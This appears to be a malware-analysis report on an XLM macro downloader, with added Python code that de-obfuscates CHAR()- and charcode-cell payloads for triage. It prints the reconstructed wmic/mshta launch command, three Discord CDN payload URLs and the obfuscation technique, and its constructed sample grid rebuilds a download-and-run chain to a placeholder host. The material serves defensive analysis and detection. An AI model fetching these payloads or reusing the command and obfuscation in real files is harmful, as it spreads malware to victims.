Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 (XLM) macros that assemble and run a command. The reconstructed command, wmic process call create 'mshta C:\ProgramData\excel.rtf', uses WMI to spawn mshta.exe on a file staged under C:\ProgramData; the recovered URLs (listed under Embedded URL below) are the sources from which the macro fetches that second-stage payload before handing it to mshta. Neither wmic nor mshta cares about the file extension: excel.rtf is executed as HTA/script content whatever its name, and the .mov suffix on the download URLs is equally cosmetic. XLM macros combined with a LOLBin launch through wmic is downloader/dropper behaviour: the workbook's job is to retrieve and execute the next stage rather than to carry it.
Heuristics (4)

- Excel 4.0 macro sheet (1 sheet(s)) [critical; 2 related findings] OOXML_XLM_MACROSHEET
  Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults; even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
- XLM payload reassembled from CHAR()/split formulas [critical] OOXML_XLM_REASSEMBLED_PAYLOAD
  An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL: the de-obfuscated download-and-run kill chain.
- URL reconstructed from XLM cell array (3 URLs) [critical] OOXML_XLM_CELL_ARRAY_URL
  Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&... / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order, plus FORMULA cell-reference concatenation in token order.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://cdn.discordapp.com/attachments/906996518161113190/907981832300134430/ptddXOVKUo.mov (referenced by macro)
  - https://cdn.discordapp.com/attachments/906996518161113190/907981690901774346/PYCMhlvK.mov (referenced by macro)
  - https://cdn.discordapp.com/attachments/907663849111556109/907974662418477056/egehHsKdkrsJ.mov (referenced by macro)
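The two reassembly findings above (CHAR()/&-built formulas and one-charcode-per-cell arrays) as a worked example. This is added code, not part of this report or of the analyzer: it starts from an already-parsed cell grid (the BIFF12 record walking the finding describes is out of scope here), and the grid SAMPLE_CELLS, the host cdn.example.invalid, the file name stage2.hta and the choice to render CALL()/EXEC() with their arguments resolved are all constructed for illustration. It generalises slightly beyond the page: reference chains of any depth, CONCATENATE(), and both row- and column-major charcode walks.

```python
# Added example, not the analyzer's code: reassemble payloads that XLM macro sheets hide
# in CHAR()/'&' formulas, fragment cells joined by reference, and charcode cell arrays.
import re

TOKEN_RE = re.compile(r'\s+|"(?:[^"]|"")*"|\$?[A-Z]{1,3}\$?[0-9]{1,7}'
                      r'|[A-Z][A-Z0-9.]*(?=\()|[0-9]+(?:\.[0-9]+)?|[&(),]')
REF_RE = re.compile(r'^\$?([A-Z]{1,3})\$?([0-9]+)$')
URL_RE = re.compile(r'https?://[^\s\'"<>,)]+')
LOLBIN_RE = re.compile(r'\b(regsvr32|rundll32|mshta|wmic|powershell|certutil)\b', re.I)

def parse_ref(ref):                      # 'AB12' -> (row 12, column 28); '$' ignored
    col, row = REF_RE.match(ref.upper()).groups()
    return int(row), sum((ord(c) - 64) * 26 ** i for i, c in enumerate(reversed(col)))

def tokenize(text):
    toks = [m.group() for m in TOKEN_RE.finditer(text)]
    if len("".join(toks)) != len(text):  # finditer skipped an unsupported character
        raise ValueError(f"unsupported syntax in {text!r}")
    return [t for t in toks if not t.isspace()]

def call(name, args):                    # string built-ins; others rendered, never executed
    if name == "CHAR":
        return chr(int(args[0]))
    if name == "CONCATENATE":
        return "".join(map(str, args))
    return f"{name}({','.join(map(str, args))})"

class XlmEvaluator:
    def __init__(self, cells):
        self.cells = {k.upper(): v for k, v in cells.items()}

    def value(self, ref):                # literal cells as-is; '=' cells evaluated
        v = self.cells.get(ref.upper().replace("$", ""), "")
        if not (isinstance(v, str) and v.startswith("=")):
            return v
        toks, pos = tokenize(v[1:]), [0]
        out = self._concat(toks, pos)
        if pos[0] != len(toks):
            raise ValueError(f"trailing tokens in {ref}: {toks[pos[0]:]}")
        return out

    def _concat(self, toks, pos):        # expr := term ('&' term)*
        out = self._term(toks, pos)
        while toks[pos[0]:pos[0] + 1] == ["&"]:
            pos[0] += 1
            out = str(out) + str(self._term(toks, pos))
        return out

    def _term(self, toks, pos):
        t = toks[pos[0]] if pos[0] < len(toks) else ""
        pos[0] += 1
        if t[:1] == '"':
            return t[1:-1].replace('""', '"')
        if t[:1].isdigit():
            return int(t) if t.isdigit() else float(t)
        if REF_RE.match(t) and toks[pos[0]:pos[0] + 1] != ["("]:
            return self.value(t)         # cell reference; recursion follows the chain
        if not t[:1].isalpha() or toks[pos[0]:pos[0] + 1] != ["("]:
            raise ValueError(f"unexpected token {t!r}")
        pos[0] += 1                      # step over the call's '('
        args = []
        while toks[pos[0]:pos[0] + 1] not in ([")"], []):
            args.append(self._concat(toks, pos))
            if toks[pos[0]:pos[0] + 1] == [","]:
                pos[0] += 1
        if toks[pos[0]:pos[0] + 1] != [")"]:
            raise ValueError("missing ')'")
        pos[0] += 1
        return call(t.upper(), args)

def decode_charcode_cells(cells, order="row"):  # numeric cells holding ASCII codes -> text
    codes = [(parse_ref(r), int(v)) for r, v in cells.items()
             if isinstance(v, (int, float)) and not isinstance(v, bool)
             and float(v).is_integer() and (v in (9, 10, 13) or 32 <= v <= 126)]
    codes.sort(key=lambda t: t[0] if order == "row" else (t[0][1], t[0][0]))
    return "".join(chr(c) for _, c in codes)

def triage(cells):                       # every formula + both charcode walks -> IOCs
    ev, strings = XlmEvaluator(cells), {}
    for ref, raw in cells.items():
        if isinstance(raw, str) and raw.startswith("="):
            try:
                strings[ref] = str(ev.value(ref))
            except (ValueError, RecursionError, IndexError) as e:
                strings[ref] = f"<unparsed: {e}>"
    for order in ("row", "column"):
        strings["charcodes/" + order] = decode_charcode_cells(cells, order)
    blob = "\n".join(strings.values())
    return {"strings": strings, "urls": sorted(set(URL_RE.findall(blob))),
            "lolbins": sorted({m.lower() for m in LOLBIN_RE.findall(blob)})}

# Constructed grid (hypothetical host/file names): CHAR()/'&' assembly, fragments joined
# by reference, a download call left unresolved, and an HTA header one charcode per cell.
SAMPLE_CELLS = {
    "C1": "C:\\ProgramData\\", "D1": '=CONCATENATE("ex","cel",".","rtf")',
    "B1": '="mshta "&C1&D1', "F1": "=E1&E2&E3&E4",
    "A1": '=CHAR(119)&CHAR(109)&"ic process call create \'"&B1&"\'"',
    "E1": "https://", "E2": "cdn.example", "E3": ".invalid/files/", "E4": "stage2.hta",
    "G1": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,F1,C1&D1,0,0)',
    **{f"{chr(65 + i)}5": code for i, code in enumerate(b"<!DOCTYPE html>")},
}
```

triage(SAMPLE_CELLS) returns the resolved text of every formula cell plus the two charcode walks, and runs the URL and LOLBin regexes over that text rather than over the raw .bin, which is the whole point: in the constructed grid, as in the sample, neither "wmic" nor the URL exists as a contiguous byte string anywhere in the cells. Functions the evaluator does not know (CALL, EXEC and the rest of the XLM library) are deliberately rendered with their arguments resolved instead of being executed, so a download-and-run chain reads as CALL(urlmon,URLDownloadToFileA,...,<url>,<path>,...) without the analysis host ever touching the URL. Real BIFF12 cells arrive as doubles; the charcode walker accepts integral floats for that reason.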
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 68617 bytes | 20a7d336058acc483315c2c52054b7791816f9039e611d8b6eaffec7ce4bc113 |

Preview (first 1,000 lines of the extracted macro sheet; BIFF12 binary, so only embedded UTF-16 strings and cell values are legible). Recoverable content:
- the path C:\ProgramData\ and the file name excel.rtf, the latter split into fragment cells (e, x, cel., rt, f) padded with filler characters;
- the full command wmic process call create 'mshta C:\ProgramData\excel.rtf', present once contiguous and once more as a fragment-padded copy;
- long runs of numeric cells (IEEE-754 doubles, one per cell) whose values are ASCII charcodes; the first rows decode to <!DOCTYPE html>, <html>, <head> and <HTA:APPLICATION, each line terminated by CR LF, i.e. the embedded HTA stored one character per cell.
(preview truncated)